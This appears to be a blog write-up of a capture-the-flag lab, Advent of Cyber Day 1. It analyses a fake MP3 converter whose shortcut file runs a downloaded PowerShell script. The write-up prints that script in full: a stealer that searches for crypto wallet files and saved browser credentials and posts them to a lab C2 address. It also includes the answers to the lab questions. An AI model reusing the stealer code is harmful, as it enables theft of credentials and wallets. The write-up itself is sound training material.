PortfolioLinkedIn

Day 1

Maybe SOC-mas music, he thought, doesn't come from a store?

In this challenge, we investigated a malicious website masquerading as a YouTube-to-MP3 converter. The task involved identifying hidden malicious files, analyzing a PowerShell script, and uncovering clues leading to the identity of the malicious actor "M.M." through poor OPSEC practices.

Story for the challenge

Start the Machine and wait for it to deploy

Navigate to the provided IP, we have a Youtube mp3/mp4 converter

The Youtube video converter website

Try giving a sample youtube video link and convert it to MP3, we got a file named download.zip Extracting it revealed two files: song.mp3 and somg.mp3

Check what type of file are those:

$ file song.mp3 song.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

Let's check the other file

$ file somg.mp3

somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID win-base-2019, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat Sep 15 01:44:14 2018, atime=Sat Sep 15 01:44:14 2018, mtime=Sat Sep 15 01:44:14 2018, length=448000, window=normal, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

This file looks suspicious. lets investigate further

Exif information

This file points to a powershell command and once it is downloaded, the script is executed with PowerShell using the iex command, which triggers the downloaded s.ps1 file.

The IS.ps1 file (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1)

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

This script is designed to collect highly sensitive information from the victim’s system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker’s remote server.

It searches for cryptocurrency wallets, browser credentials and sends stolen data to a Command & Control (C2) server at http://papash3ll.thm/data

The script contained an ASCII art signature:

"Created by the one and only M.M."

Search for this signature on Github.com, we get this result:

Github search result

If you look through the search results, you can be able infer the malicious actor’s identity based on information on the project’s page and the GitHub Issues section.

Issues

Real Name of M.M can be found through his github readme file:

MM's readme.md

Also check the number of commits made on the repo where issue was raised

Commits

Questions

1.Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?

A: Tyler Ramsbey

2.The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?

A: http://papash3ll.thm/data

3.Who is M.M? Maybe his Github profile page would provide clues?

A: Mayor Malware

4.What is the number of commits on the GitHub repo where the issue was raised?

A: 1

5.If you enjoyed this task, feel free to check out the OPSEC room!

A: No answer needed

6.What's with all these GitHub repos? Could they hide something else?

A: No answer needed

Thank you!

PreviousAdvent of Cyber 2024NextDay 2

Last updated

Was this helpful?